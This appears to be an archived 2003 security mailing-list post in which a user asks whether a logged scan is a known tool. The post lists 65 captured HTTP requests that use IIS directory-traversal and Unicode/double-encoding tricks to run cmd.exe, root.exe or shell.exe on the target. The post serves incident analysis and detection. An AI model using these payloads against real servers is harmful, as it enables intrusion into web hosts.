Hosting Provided By

New attack or old Vulnerability Scanner?

This message: [ Message body ] [ More options ]
Related messages: [ Next message ] [ Previous message ] [ Next in thread ] [ Replies ]

From: Mark Embrich <mark_embrich(at)yahoo.com>
Date: Thu Apr 24 2003 - 19:43:43 EDT

('binary' encoding is not supported, stored as-is)

Hello,

Does anyone recognize this pattern of a TCP connect scan, then 65 GETs? Note that it also included: "User-Agent:.Mozilla/3.0. (compatible;.Indy.Library)...."
For which my googling tells me that this attack/scanner is probably built using Borland Delphi/C++ Builder suite.

I've so far received 3 of these from 2 different IP addresses. The first two were from a Comcast cable user. The last was from a Cox Communications IP.

Thanks,
Mark Embrich

0.	Scan TCP 80
1.	GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
2.	GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
3.	GET./_vti_bin/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
4.	GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
5.	GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
6.	GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
7.	GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
8.	GET./_vti_bin/..%255c..%255c..%255c..%255c..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
9.	GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
10.	GET./_vti_bin/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
11.	GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
12.	GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
13.	GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
14.	GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
15.	GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
16.	GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
17.	GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
18.	GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
19.	GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
Do you need help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
20.	GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
21.	GET./msadc/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
22.	GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
23.	GET./msadc/..%%35%63../..%%35%63../..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
24.	GET./MSADC/..%%35c..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
25.	GET./msadc/..%%35c../..%%35c../..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
26.	GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
27.	GET./msadc/..%25%35%63../..%25%35%63../..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
28.	GET./msadc/..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
29.	GET./msadc/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
30.	GET./msadc/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
31.	GET./msadc/..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
32.	GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%
af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
33.	GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
34.	GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
35.	GET./PBServer/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
36.	GET./PBServer/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
37.	GET./PBServer/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
38.	GET./PBServer/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
39.	GET./Rpc/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
40.	GET./Rpc/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
Do you need more help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
41.	GET./Rpc/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
42.	GET./Rpc/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
43.	GET./samples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
44.	GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
45.	GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
46.	GET./scripts/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
47.	GET./scripts/..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
48.	GET./scripts/..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
49.	GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
50.	GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%
AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
51.	GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
52.	GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
53.	GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%
1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
54.	GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
55.	GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
56.	GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%
9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
57.	GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
58.	GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
59.	GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
60.	GET./scripts/..%e0%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
61.	GET./scripts/..%f0%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
62.	GET./scripts/..%f8%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
63.	GET./scripts/..%fc%80%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
64.	GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
Can we help you? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
65.	GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..

----------------------------------------------------------------------------

Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents

Received on Fri Apr 25 14:43:42 2003

This message: [ Message body ]
Next message: Tobias Klein: "Re: msamba"
Previous message: Patrick Nolan: "Re: Trojan found..."
Next in thread: Keith: "RE: New attack or old Vulnerability Scanner?"
Reply: Keith: "RE: New attack or old Vulnerability Scanner?"
Reply: rhandwerker(at)iss.net: "Re: New attack or old Vulnerability Scanner?"
Reply: jac: "Re: New attack or old Vulnerability Scanner?"
Reply: James C. Slora, Jr.: "RE: New attack or old Vulnerability Scanner?"
Reply: Danny: "Anyone know this tool?"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:04 EDT